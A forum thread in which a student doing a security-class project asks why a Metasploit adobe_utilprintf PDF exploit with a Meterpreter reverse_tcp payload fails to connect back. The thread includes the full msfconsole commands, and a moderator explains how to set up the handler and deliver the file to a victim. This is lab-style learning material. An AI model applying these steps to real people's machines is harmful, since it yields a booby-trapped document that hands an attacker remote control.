Results 1 to 4 of 4

Thread: Issues with Client Side Attack: PDF exploit

  1. #1
    Just burned his ISO
    Join Date
    Nov 2010
    Posts
    3

    Default Issues with Client Side Attack: PDF exploit

    Hello! I'm obviously very new to the backtrack forums, well posting here that is, and Ive been using the resources here for about a week already to do a project for my security class. I was doing pretty well until I just hit a wall for like 2 days straight trying to figure out how the PDF fileformat exploit with reverse_tcp payload works. I've been following the Metasploit Unleashed course, which is a great resource, but the problem is I just cant get what there putting in the examples to actually work.

    I have research also different sources online, but still found no definite answer.

    heres what I've been doing:

    Code:
    msf > use exploit/windows/fileformat/adobe_utilprintf
    msf exploit(adobe_utilprintf) > set FILENAME
    FILENAME => support again.pdfdsada
    msf exploit(adobe_utilprintf) > set FILENAME support.pdf
    FILENAME => support.pdf
    msf exploit(adobe_utilprintf) > show options
    
    Module options:
    
       Name        Current Setting                      Required  Description
       ----        ---------------                      --------  -----------
       FILENAME    support.pdf                          yes       The file name.
       OUTPUTPATH  /opt/metasploit3/msf3/data/exploits  yes       The location of the file.
    
    
    Exploit target:
    
       Id  Name
       --  ----
       0   Adobe Reader v8.1.2 (Windows XP SP3 English)
    
    
    msf exploit(adobe_utilprintf) > set PAYLOAD windows/meterpreter/reverse_tcp
    PAYLOAD => windows/meterpreter/reverse_tcp
    msf exploit(adobe_utilprintf) > set LHOST 192.168.1.19
    LHOST => 192.168.1.19
    msf exploit(adobe_utilprintf) > show options
    
    Module options:
    
       Name        Current Setting                      Required  Description
       ----        ---------------                      --------  -----------
       FILENAME    support.pdf                          yes       The file name.
       OUTPUTPATH  /opt/metasploit3/msf3/data/exploits  yes       The location of the file.
    
    
    Payload options (windows/meterpreter/reverse_tcp):
    
       Name      Current Setting  Required  Description
       ----      ---------------  --------  -----------
       EXITFUNC  process          yes       Exit technique: seh, thread, none, process
       LHOST     192.168.1.19     yes       The listen address
       LPORT     4444             yes       The listen port
    
    
    Exploit target:
    
       Id  Name
       --  ----
       0   Adobe Reader v8.1.2 (Windows XP SP3 English)
    
    
    msf exploit(adobe_utilprintf) > exploit
    [*] Creating 'support.pdf' file...[*] Generated output file /opt/metasploit3/msf3/data/exploits/support.pdf[*] Exploit completed, but no session was created.
    Now when I took a second look the only difference I saw in the code was when the exploit activated it did not set up the handler correctly. In the example it fully stated this:

    Code:
    msf exploit(adobe_utilprintf) > exploit
    [*] Handler binding to LHOST 0.0.0.0[*] Started reverse handler[*] Creating 'BestComputers-UpgradeInstructions.pdf' file...[*] Generated output file /pentest/exploits/framework3/data/exploits/BestComputers-UpgradeInstructions.pdf[*] Exploit completed, but no session was created.
    Again I'm just stumped on this whole problem. It might be a simple fix that I am overlooking, and If it is I apologize for posting but I really would like to know what I'm doing wrong. Also I've been trying to do this between two different computers on the same network but still when I activate the pdf file (even using adobe reader 8) it will not try to connect to the listening host.

    Again I would really appreciate if someone could guide me through this problem, and I thank everyone in advance who responds

  2. #2
    Super Moderator lupin's Avatar
    Join Date
    Jan 2010
    Posts
    2,943

    Default Re: Issues with Client Side Attack: PDF exploit

    Metasploit may not be starting the Meterpreter handler - in my experience it often does not do this for fileformat style exploits. Use the jobs command to check if the handler is started or not.

    If the handler is not started, just start it manually - use the "multi/handler" module and set the payload + options in the same way as you did above. Then when you transfer the PDF you generated (/opt/metasploit3/msf3/data/exploits/support.pdf) to your victim system and open it, the reverse Meterpreter shell should connect back to your configured handler.
    Capitalisation is important. It's the difference between "Helping your brother Jack off a horse" and "Helping your brother jack off a horse".

    The Forum Rules, Forum FAQ and the BackTrack Wiki... learn them, love them, live them.

  3. #3
    Just burned his ISO
    Join Date
    Nov 2010
    Posts
    3

    Default Re: Issues with Client Side Attack: PDF exploit

    Quote Originally Posted by lupin View Post
    Metasploit may not be starting the Meterpreter handler - in my experience it often does not do this for fileformat style exploits. Use the jobs command to check if the handler is started or not.

    If the handler is not started, just start it manually - use the "multi/handler" module and set the payload + options in the same way as you did above. Then when you transfer the PDF you generated (/opt/metasploit3/msf3/data/exploits/support.pdf) to your victim system and open it, the reverse Meterpreter shell should connect back to your configured handler.
    thank you for the response Lupin . I forgot to mention that I did set up the handler manually with the LHOST and LPORT the same was it was set in the pdf. But when i ran it on the system it didnt connect back at all. This is where the real situation is.

    Again when I create the actual pdf file using the utilprintf exploit the handler does not bind with the LHOST nor does it set up the reverse handler, unlike every tutorial and video has shown me. Could there be perhaps another reason why this could happen? Thanks in advance for answers!

  4. #4
    Super Moderator lupin's Avatar
    Join Date
    Jan 2010
    Posts
    2,943

    Default Re: Issues with Client Side Attack: PDF exploit

    Is your target systems version of Acrobat reader vulnerable to that exploit? Try with a Windows exec payload that runs calc.exe if you're not sure.
    Capitalisation is important. It's the difference between "Helping your brother Jack off a horse" and "Helping your brother jack off a horse".

    The Forum Rules, Forum FAQ and the BackTrack Wiki... learn them, love them, live them.

Similar Threads

  1. Replies: 3
    Last Post: 01-06-2010, 09:19 PM
  2. Client Side Vulnerability Noob Question
    By mikeody in forum OLD Newbie Area
    Replies: 4
    Last Post: 01-06-2010, 03:34 AM
  3. how to configure Metasploit Client-Side Attack
    By black02 in forum OLD Newbie Area
    Replies: 2
    Last Post: 04-09-2009, 08:03 PM
  4. Fast-track Mass Client-Side Attack with Atheros
    By vollnormal in forum OLD BT4beta Bugs and Fixes
    Replies: 1
    Last Post: 02-28-2009, 12:55 PM
  5. Mass Client Side
    By opreat0r in forum OLD Tutorials and Guides
    Replies: 15
    Last Post: 10-05-2008, 10:48 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •